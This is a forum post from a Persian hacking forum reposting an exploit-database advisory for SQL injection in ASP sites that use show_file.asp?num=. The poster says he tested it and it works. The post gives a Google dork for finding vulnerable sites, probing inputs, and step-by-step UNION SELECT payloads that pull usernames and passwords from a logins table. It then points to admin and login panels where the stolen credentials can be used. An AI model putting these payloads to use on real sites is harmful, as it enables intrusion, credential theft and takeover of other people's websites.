Parsi Coders

این باگ sql injection هست برای سایت های asp.net اینم اکسپلویتش تستش زدم خوب چیزیه یه عرب هم نوشتتش اما چیز خیلی ساده ای هست :-)

کد:
=============================================

ASP Exploitation SQL Injection Vulnerability

=============================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          

0     _                   __           __       __                     1

1   /' \            __  /'__`\        /\ \__  /'__`\                   0

0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1

1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0

0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1

1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0

0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1

1                  \ \____/ >> Exploit database separated by exploit   0

0                   \/___/          type (local, remote, DoS, etc.)    1

1                                                                      0

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#######################################################################

#

# Exploit Title: [ ASP Exploitation SQL Injection Vulnerability ] ..

#

# Date: [ 2010-06-17 ] ..

#

# Author: [ SUp3r00t - heShAm_HaCkEr ] ..

#

# Version: [ Scripts((asp)) ] ..

#

# Google dork: [ show_file.asp?num= ] ..  

#

# TeaM: [ T.v.T ((http://www.pro1tv.com)) ] ..

#

# From: Saudi Arabia ..

#

# Gr33t's: The Master|Al-Kaser20|T.v.T

#

#category: [SQL Injecti0n] ..

# 

#######################################################################

# Exploit :  

http://[site]/path/show_file.asp?num={SQL}  

# Analysis: 

http://[site]/path/show_file.asp?num=Number  

union select ((Number)) login, ((Number)) from logins  

========================================================================

# Like:

http://[site]/path/show_file.asp?num=50

http://[site]/path/show_file.asp?num=50'

http://[site]/path/show_file.asp?num=50 having 1=1

((')) <<<<< Keep the label to show a query site involved ..

(( having 1=1 )) << Yes, this revealed the site involved ..

========================================================================  

# Like:1

http://[site]/path/show_file.asp?num=50 order by 20 

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from logins  

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,name,19,20 from logins 

union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,18,19,20 from logins 

========================================================================

# Final:

http://[site]/path/show_file.asp?num=-50 union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,name,19,20 from logins

The source of plaque control:- 

http://[site]/path/admin "OR" http://[site]/path/login

cpanel: http://[site]/admin "OR" http://[site]/login

========================================================================

./ Sup3r00t@gmail.com

./ pro1tv.com

Amin_Mansouri